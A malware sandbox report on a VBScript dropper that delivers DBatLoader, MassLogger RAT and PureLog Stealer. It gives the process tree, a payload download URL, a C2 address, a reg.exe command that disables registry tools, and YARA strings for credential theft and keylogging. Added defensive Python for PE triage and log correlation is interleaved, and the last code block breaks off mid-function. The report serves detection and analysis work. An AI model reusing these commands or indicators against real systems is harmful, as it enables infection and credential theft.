
Windows Analysis Report
INQUIRY LIST 292.vbs

Overview

General Information

Sample name: INQUIRY LIST 292.vbs
Analysis ID: 1592501
MD5: 2f5edacbfdae7a51267deeb8e937bfec
SHA1: d0ce895b7a4e55fe7f12121878a5818850f1dc00
SHA256: 07898f8cb7e07bd6b86fd09cfff5898eb246a44524b3dda7a39e3de32667490b
Tags: vbs, user-abuse_ch

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
PE file contains section with special chars
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: WScript or CScript Dropper
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match
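Several of the static signatures above (PE file contains an invalid checksum; Entry point lies outside standard sections; PE file contains sections with non-standard names; PE file contains section with special chars) are cheap PE-header checks that a triage script can reproduce before any sandbox run. The block below is an added example, not Joe Sandbox code: it parses the COFF/optional/section headers with the standard library, computes the loader's checksum algorithm, and evaluates the three checks. Because the sample itself is not part of this page, the input is a constructed minimal PE32 built by `build_pe`; the set of "standard" code section names is an assumption for the example.

```python
import struct

# Section names a linker normally emits for code. Anything else hosting the entry point
# is reported. This set is an assumption for the example, not the sandbox's own list.
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code", ".init", "INIT"}
KNOWN_SECTIONS = STANDARD_CODE_SECTIONS | {
    ".data", ".rdata", ".rsrc", ".reloc", ".idata", ".edata", ".pdata", ".bss", ".tls"}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE image checksum: fold every 32-bit word except the CheckSum field itself into a
    16-bit ones'-complement sum, then add the file length (same algorithm the loader uses)."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == (checksum_offset & ~3):
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def triage(data: bytes) -> dict:
    """Parse the PE headers and evaluate the three static checks named in the signatures."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    stored = struct.unpack_from("<I", data, opt + 64)[0]      # CheckSum
    sections = []
    for i in range(nsections):
        raw_name, vsize, vaddr, rawsize = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        name = raw_name.rstrip(b"\0").decode("latin-1")
        sections.append((name, vaddr, max(vsize, rawsize)))
    ep_section = next((n for n, va, sz in sections if va <= entry_rva < va + sz), None)
    computed = pe_checksum(data, opt + 64)
    return {
        "entry_point_section": ep_section,
        "entry_point_outside_standard_sections": ep_section not in STANDARD_CODE_SECTIONS,
        "nonstandard_section_names": [n for n, _, _ in sections if n not in KNOWN_SECTIONS],
        "section_name_with_special_chars": any(
            not all(c == "." or c == "_" or c.isalnum() for c in n) for n, _, _ in sections),
        "checksum_stored": stored,
        "checksum_computed": computed,
        # A zero CheckSum means "not set" (common for user-mode binaries); only a non-zero
        # value that disagrees with the computed one counts as an invalid checksum.
        "checksum_invalid": stored != 0 and stored != computed,
    }


def build_pe(entry_rva: int, section_name: bytes, checksum: int = 0) -> bytes:
    """Construct a minimal PE32 image with one 512-byte section (test input, not a real sample)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)          # i386, one section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                   # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                              # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)              # ImageBase, SectionAlign, FileAlign
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)                         # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 64, checksum)                               # CheckSum
    sec = struct.pack("<8sIIIIIIHHI", section_name[:8].ljust(8, b"\0"),
                      0x1000, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    return headers + b"\xC3" * 0x200                                        # section body: `ret` bytes


def set_valid_checksum(data: bytes) -> bytes:
    """Write the correct CheckSum into an image (what a linker does when asked to)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    off = e_lfanew + 4 + 20 + 64
    fixed = bytearray(data)
    struct.pack_into("<I", fixed, off, pe_checksum(data, off))
    return bytes(fixed)


if __name__ == "__main__":
    print("clean:", triage(set_valid_checksum(build_pe(0x1000, b".text"))))
    print("odd:  ", triage(build_pe(0x1800, b"\x01\x02xyz", checksum=0x1234)))
```

On a real sample, pass `open(path, "rb").read()` to `triage`; the entry-point check uses the larger of VirtualSize and SizeOfRawData so a section whose raw data is smaller than its mapped size (typical for packed stubs) is still located.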

Classification

  • System is w10x64
  • wscript.exe (PID: 7160 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 6492 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 4692AEE744A1B1FAB794FF334A77A462)
      • cmd.exe (PID: 3584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\UhzauuilF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3140 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • liuuazhU.pif (PID: 1856 cmdline: C:\Users\Public\Libraries\liuuazhU.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
        • reg.exe (PID: 6612 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Uhzauuil.PIF (PID: 2104 cmdline: "C:\Users\Public\Libraries\Uhzauuil.PIF" MD5: 4692AEE744A1B1FAB794FF334A77A462)
    • liuuazhU.pif (PID: 5640 cmdline: C:\Users\Public\Libraries\liuuazhU.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • reg.exe (PID: 1516 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • conhost.exe (PID: 1144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Uhzauuil.PIF (PID: 3796 cmdline: "C:\Users\Public\Libraries\Uhzauuil.PIF" MD5: 4692AEE744A1B1FAB794FF334A77A462)
    • liuuazhU.pif (PID: 5956 cmdline: C:\Users\Public\Libraries\liuuazhU.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • reg.exe (PID: 3584 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

DBatLoader: {"Download Url": ["https://www.volareconsultoria.com.br/245_Uhzauuilkul"]}

Source | Rule | Description | Author | Strings
00000011.00000001.2046847022.0000000000400000.00000040.00000001.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 FC 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x22bae:$a1: get_encryptedPassword
  • 0x22b82:$a2: get_encryptedUsername
  • 0x22c46:$a3: get_timePasswordChanged
  • 0x22b5e:$a4: get_passwordField
  • 0x22bc4:$a5: set_encryptedPassword
  • 0x22991:$a7: get_logins
  • 0x21f1b:$a8: GetOutlookPasswords
  • 0x213e0:$a9: StartKeylogger
  • 0x1fe18:$a10: KeyLoggerEventArgs
  • 0x1fde7:$a11: KeyLoggerEventArgsEventHandler
  • 0x22a65:$a13: _encryptedPassword
0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
(67 entries in the full report; the remaining rows are not included in this export)
Source | Rule | Description | Author | Strings
17.2.liuuazhU.pif.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 FC 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
17.1.liuuazhU.pif.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 FC 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
6.3.liuuazhU.pif.1b37a088.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
6.3.liuuazhU.pif.1b37a088.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
6.3.liuuazhU.pif.1b37a088.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x1fea6:$a1: get_encryptedPassword
  • 0x1fe7a:$a2: get_encryptedUsername
  • 0x1ff3e:$a3: get_timePasswordChanged
  • 0x1fe56:$a4: get_passwordField
  • 0x1febc:$a5: set_encryptedPassword
  • 0x1fc89:$a7: get_logins
  • 0x1f213:$a8: GetOutlookPasswords
  • 0x1e6d8:$a9: StartKeylogger
  • 0x1d110:$a10: KeyLoggerEventArgs
  • 0x1d0df:$a11: KeyLoggerEventArgsEventHandler
  • 0x1fd5d:$a13: _encryptedPassword
(189 entries in the full report; the remaining rows are not included in this export)

            System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6492, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\liuuazhU.pif, CommandLine: C:\Users\Public\Libraries\liuuazhU.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\liuuazhU.pif, NewProcessName: C:\Users\Public\Libraries\liuuazhU.pif, OriginalFileName: C:\Users\Public\Libraries\liuuazhU.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 6492, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\liuuazhU.pif, ProcessId: 1856, ProcessName: liuuazhU.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Uhzauuil.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uhzauuil
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 193.122.6.168, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\liuuazhU.pif, Initiated: true, ProcessId: 1856, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", ProcessId: 7160, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Uhzauuil.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uhzauuil
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\liuuazhU.pif, CommandLine: C:\Users\Public\Libraries\liuuazhU.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\liuuazhU.pif, NewProcessName: C:\Users\Public\Libraries\liuuazhU.pif, OriginalFileName: C:\Users\Public\Libraries\liuuazhU.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 6492, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\liuuazhU.pif, ProcessId: 1856, ProcessName: liuuazhU.pif
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", ProcessId: 7160, ProcessName: wscript.exe
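The Sigma hits listed above reduce to a handful of field tests on Sysmon events: a FileCreate (EventID 11) whose directory component carries a trailing space so that "C:\Windows \SysWOW64" masquerades as the real system directory, a Run-key value (EventID 13) pointing into C:\Users\Public, process creation (EventID 1) from that folder, a script host launching a .vbs, and reg.exe setting DisableRegistryTools. The block below is an added example, not Joe Sandbox or SigmaHQ code: it implements approximations of those rules in Python and runs them over constructed Sysmon-style records that mirror the events on this page. The wscript.exe parent (explorer.exe), the two benign control events, the folder list and the rule names are assumptions of the example; the real Sigma rules use broader, tuned selections.

```python
import re

# Constructed Sysmon-style events. Values come from this report where it prints them;
# the wscript.exe parent, the msiexec.exe control events and the PID 4000 are invented.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe", "ProcessId": 7160,
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Local\Temp\x.exe", "ProcessId": 6492,
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\x.exe"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"EventID": 11, "Image": r"C:\Users\user\AppData\Local\Temp\x.exe", "ProcessId": 6492,
     "TargetFilename": "C:\\Windows \\SysWOW64\\NETUTILS.dll"},            # note the space
    {"EventID": 13, "Image": r"C:\Users\user\AppData\Local\Temp\x.exe", "ProcessId": 6492,
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uhzauuil",
     "Details": r"C:\Users\Public\Uhzauuil.url"},
    {"EventID": 1, "Image": r"C:\Users\Public\Libraries\liuuazhU.pif", "ProcessId": 1856,
     "CommandLine": r"C:\Users\Public\Libraries\liuuazhU.pif",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\x.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe", "ProcessId": 6612,
     "CommandLine": r"REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f",
     "ParentImage": r"C:\Users\Public\Libraries\liuuazhU.pif"},
    # benign controls: the same DLL name in the real SysWOW64, and a Run key into Program Files
    {"EventID": 11, "Image": r"C:\Windows\System32\msiexec.exe", "ProcessId": 4000,
     "TargetFilename": r"C:\Windows\SysWOW64\NETUTILS.dll"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe", "ProcessId": 4000,
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
]

# Folders a user-writable dropper typically lands in (assumed list for the example).
SUSPICIOUS_DIRS = ("c:\\users\\public", "\\appdata\\local\\temp", "c:\\windows\\temp", "c:\\programdata")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
EXEC_EXTS = (".exe", ".pif", ".scr", ".com", ".cmd", ".bat")


def dir_component_with_trailing_space(path):
    """Return the first directory component ending in whitespace, e.g. 'Windows ' in
    'C:\\Windows \\SysWOW64\\x.dll'. Win32 normally strips trailing spaces from path
    components, so such a directory only exists if it was created deliberately (e.g. via a
    \\\\?\\ path), and it is a look-alike of a trusted location, not the location itself."""
    for comp in path.split("\\")[:-1]:
        if comp and comp != comp.rstrip():
            return comp
    return None


def evaluate(event):
    """Return the names of the example rules this single event satisfies."""
    hits = []
    eid = event["EventID"]
    image = event.get("Image", "").lower()
    if eid == 11:
        if dir_component_with_trailing_space(event["TargetFilename"]):
            hits.append("dll_search_order_hijack_space_in_path")
    elif eid == 13:
        if "\\currentversion\\run" in event["TargetObject"].lower() and \
                any(d in event["Details"].lower() for d in SUSPICIOUS_DIRS):
            hits.append("run_key_to_suspicious_folder")
    elif eid == 1:
        cmd = event.get("CommandLine", "")
        parent = event.get("ParentImage", "").lower()
        if any(d in image for d in SUSPICIOUS_DIRS):
            hits.append("execution_from_suspicious_folder")
        if image.endswith(SCRIPT_HOSTS) and cmd.lower().rstrip('"').endswith(SCRIPT_EXTS):
            hits.append("script_file_via_wscript")
        if parent.endswith(SCRIPT_HOSTS) and image.endswith(EXEC_EXTS):
            hits.append("wscript_dropper")
        if image.endswith("\\reg.exe") and \
                re.search(r"policies\\system.*\b(disableregistrytools|disabletaskmgr)\b", cmd, re.I):
            hits.append("registry_tools_disabled_via_reg")
    return hits


def run(events):
    """Evaluate every event; return (event index, rule name) pairs."""
    return [(i, rule) for i, e in enumerate(events) for rule in evaluate(e)]


if __name__ == "__main__":
    for i, rule in run(EVENTS):
        print(f"event {i} pid {EVENTS[i]['ProcessId']}: {rule}")
```

The trailing-space test is the one worth keeping even if the rest is replaced by proper Sigma tooling: a path comparison that normalises whitespace, or a human reading "C:\Windows \SysWOW64\NETUTILS.dll" in a log, will treat the drop as a write to the real system directory.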
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-16T08:29:14.702006+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 50.116.86.44 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-16T08:29:21.836380+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 193.122.6.168 | 80 | TCP
2025-01-16T08:29:34.882496+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49740 | 193.122.6.168 | 80 | TCP
2025-01-16T08:29:41.869304+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 193.122.6.168 | 80 | TCP
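The IDS rows above and the Sysmon network-connection entry in the Sigma list share one 5-tuple (192.168.2.4:49732 -> 193.122.6.168:80/tcp), which is what lets an analyst say that the SID 2803274 alert was raised by liuuazhU.pif (PID 1856) rather than by some other process on the host. The block below is an added example, not Joe Sandbox code, of that attribution: it reads Suricata EVE alert records and Sysmon Event ID 3 records, keys both by 5-tuple, and picks the endpoint event closest in time within a small window. The EVE lines and Sysmon records are constructed from the values on this page; the Sysmon UtcTime (the report prints none), the signature text, the decoy agent.exe connection and the 5-second window are assumptions of the example. Alerts on ports the page gives no Sysmon event for (49731, 49740) stay unattributed rather than being guessed.

```python
import json
from datetime import datetime, timezone, timedelta

# Constructed Suricata EVE records carrying the SIDs, tuples and timestamps from the IDS
# table above (signature text is not in the report and is marked as such). The fourth
# line is a non-alert record to show it is skipped.
EVE_LINES = [
    '{"timestamp":"2025-01-16T08:29:14.702006+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49731,"dest_ip":"50.116.86.44","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"severity":3,"category":"Unknown Traffic","signature":"(text not in report)"}}',
    '{"timestamp":"2025-01-16T08:29:21.836380+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49732,"dest_ip":"193.122.6.168","dest_port":80,"proto":"TCP","alert":{"signature_id":2803274,"severity":2,"category":"Potentially Bad Traffic","signature":"(text not in report)"}}',
    '{"timestamp":"2025-01-16T08:29:34.882496+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49740,"dest_ip":"193.122.6.168","dest_port":80,"proto":"TCP","alert":{"signature_id":2803274,"severity":2,"category":"Potentially Bad Traffic","signature":"(text not in report)"}}',
    '{"timestamp":"2025-01-16T08:29:30.000000+0100","event_type":"flow","src_ip":"192.168.2.4","src_port":49735,"dest_ip":"192.168.2.1","dest_port":53,"proto":"UDP"}',
]

# Constructed Sysmon Event ID 3 records. The first copies the report's network-connection
# entry (PID 1856, liuuazhU.pif, source port 49732); its UtcTime is invented. The second
# is a decoy that reuses source port 49732 later towards a different destination.
SYSMON_NET = [
    {"EventID": 3, "UtcTime": "2025-01-16 07:29:21.840", "ProcessId": 1856,
     "Image": r"C:\Users\Public\Libraries\liuuazhU.pif", "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.4", "SourcePort": 49732, "DestinationIp": "193.122.6.168", "DestinationPort": 80},
    {"EventID": 3, "UtcTime": "2025-01-16 07:31:05.100", "ProcessId": 4242,
     "Image": r"C:\Program Files\Vendor\agent.exe", "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.4", "SourcePort": 49732, "DestinationIp": "10.0.0.5", "DestinationPort": 80},
]

WINDOW = timedelta(seconds=5)   # assumed tolerance between sensor clocks


def parse_eve_time(ts):
    """EVE timestamps carry a numeric UTC offset, e.g. 2025-01-16T08:29:21.836380+0100."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def parse_sysmon_time(ts):
    """Sysmon UtcTime is UTC without an offset, e.g. 2025-01-16 07:29:21.840."""
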